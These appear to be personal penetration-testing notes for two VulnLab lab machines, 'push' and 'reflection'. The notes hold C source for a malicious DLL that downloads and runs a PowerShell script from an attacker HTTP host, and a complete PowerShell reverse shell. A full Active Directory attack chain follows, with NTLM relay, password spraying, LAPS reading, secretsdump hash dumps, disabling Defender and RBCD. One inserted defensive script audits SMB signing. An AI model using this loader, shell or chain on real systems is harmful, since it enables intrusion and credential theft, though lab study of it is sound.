vulnlab-push

a hard Windows machine

preparation

create puck.c on the Kali box

puck.c contains:

#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:

            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");


            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create the malicious DLL

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR
$address = '192.168.1.136'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

on the attacker PC run an HTTP listener and an nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on the Windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are successful, we continue to the writeup.

Writeup:

To abuse ClickOnce we follow the article: we need to upload our SelfService.dll.deploy, which will download and execute a reverse shell.

More to come …

With a shell as kelly.hill we find her credentials in her home folder.

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' 
xfreerdp  /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

We also find a user directory named SCCM.

*Evil-WinRM* PS C:\Users\kelly.hill\documents> curl http://10.8.2.138:8000/SharpSCCM.exe -o SharpSCCM.exe 
*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[!] Could not connect to \\127.0.0.1\root\CCM: Access denied
[+] Completed execution in 00:00:05.3229360

BloodHound analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp  

check machine account quota

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq 
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
LDAP        DC01.push.vl    389    DC01             [+] push.vl\Olivia.Wood:DeployTrust07 
MAQ         DC01.push.vl    389    DC01             [*] Getting the MachineAccountQuota
MAQ         DC01.push.vl    389    DC01             MachineAccountQuota: 10

.

vulnlab-reflection

Reflection is a medium Active Directory chain consisting of three machines: MS01, WS01 and DC01. On MS01, MSSQL staging credentials are found on an SMB share. The SQL service's NTLM authentication is then relayed to DC01's SMB shares, where the service account has access to the prod share, which contains credentials for the production database. That database yields two domain credentials. abbie.smith has GenericAll on MS01, which lets us read its LAPS password; dumping the credential vault on MS01 gives Georgia.Price's password, and she in turn has GenericAll on WS01. With full control of MS01 we perform Resource Based Constrained Delegation (RBCD) against WS01, dump it as well and obtain Rhys.Garner's password, which is reused on DOM_RGARNER, a member of Domain Admins.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

mssql enum

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

john svc_web_staging.hash --wordlist=/usr/share/wordlists/rockyou.txt  -> uncrackable

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []

Next we do an NTLM relay attack to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger it from our SQL shell

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on my Kali box

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 
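Both MS01 and DC01 answered the share enumeration with signing:False, which is what lets the NTLM authentication coerced out of the SQL service be relayed to DC01. The script below is an added example, not code from this writeup: it parses crackmapexec-style SMB banner and maq module lines (the sample lines are constructed to mirror the ones shown here) and lists the settings a defender would change to close this relay path.

```python
"""Relay-exposure triage from crackmapexec-style output (added example,
not from the writeup). Folds the SMB banner and 'maq' module lines into
one record per host and reports the settings the relay above relies on."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Banner printed for every SMB target, e.g.
#   SMB  ms01.reflection.vl 445  MS01  [*] Windows Server ... (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
BANNER_RE = re.compile(
    r"^SMB\s+(?P<target>\S+)\s+445\s+\S+\s+\[\*\]\s+(?P<os>.*?)\s*"
    r"\(name:(?P<name>[^)]*)\)\s*\(domain:(?P<domain>[^)]*)\)\s*"
    r"\(signing:(?P<signing>True|False)\)\s*\(SMBv1:(?P<smbv1>True|False)\)"
)
# Result line of the 'maq' module, e.g.
#   MAQ  DC01.push.vl  389  DC01  MachineAccountQuota: 10
MAQ_RE = re.compile(
    r"^MAQ\s+(?P<target>\S+)\s+389\s+\S+\s+MachineAccountQuota:\s*(?P<maq>\d+)"
)


@dataclass
class HostPosture:
    target: str
    name: str = ""
    domain: str = ""
    signing_required: Optional[bool] = None   # None: no SMB banner seen
    smbv1_enabled: Optional[bool] = None
    maq: Optional[int] = None                 # None: maq module not run


def parse_output(lines: List[str]) -> Dict[str, HostPosture]:
    """Fold banner and MAQ lines into one HostPosture per (lower-cased) target."""
    hosts: Dict[str, HostPosture] = {}
    for raw in lines:
        line = raw.strip()
        m = BANNER_RE.match(line)
        if m:
            key = m["target"].lower()
            h = hosts.setdefault(key, HostPosture(key))
            h.name, h.domain = m["name"], m["domain"]
            h.signing_required = m["signing"] == "True"
            h.smbv1_enabled = m["smbv1"] == "True"
            continue
        m = MAQ_RE.match(line)
        if m:
            key = m["target"].lower()
            h = hosts.setdefault(key, HostPosture(key))
            h.maq = int(m["maq"])
    return hosts


def findings(hosts: Dict[str, HostPosture]) -> List[str]:
    """One line per setting that enables the relay path, sorted by target."""
    out: List[str] = []
    for key in sorted(hosts):
        h = hosts[key]
        if h.signing_required is False:
            out.append(f"{h.target}: SMB signing not required, a relayed NTLM "
                       f"authentication is accepted (require signing)")
        if h.smbv1_enabled:
            out.append(f"{h.target}: SMBv1 enabled (disable it)")
        if h.maq is not None and h.maq > 0:
            out.append(f"{h.target}: MachineAccountQuota={h.maq}, any domain user "
                       f"may add computer accounts (set it to 0)")
    return out


# Constructed sample, mirroring the crackmapexec lines shown in this writeup.
SAMPLE_OUTPUT = [
    "SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)",
    "LDAP        DC01.push.vl    389    DC01             [+] push.vl\\Olivia.Wood:<redacted>",
    "MAQ         DC01.push.vl    389    DC01             [*] Getting the MachineAccountQuota",
    "MAQ         DC01.push.vl    389    DC01             MachineAccountQuota: 10",
    "SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)",
    "SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)",
    "MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0",
]

if __name__ == "__main__":
    for line in findings(parse_output(SAMPLE_OUTPUT)):
        print(line)
```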

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

sqsh to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

ldap search

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

bloodhound

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

check machine account quota

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

check LAPS

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

check whether the LAPS password is reused by users on ws01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the admin account to RDP to the box and start enumerating it

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

On MS01 we disable Defender and upload mimikatz.exe; we find:
Georgia.Price
DBl<redacted>id

RBCD attack on ws01.reflection.vl (via MS01)

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  
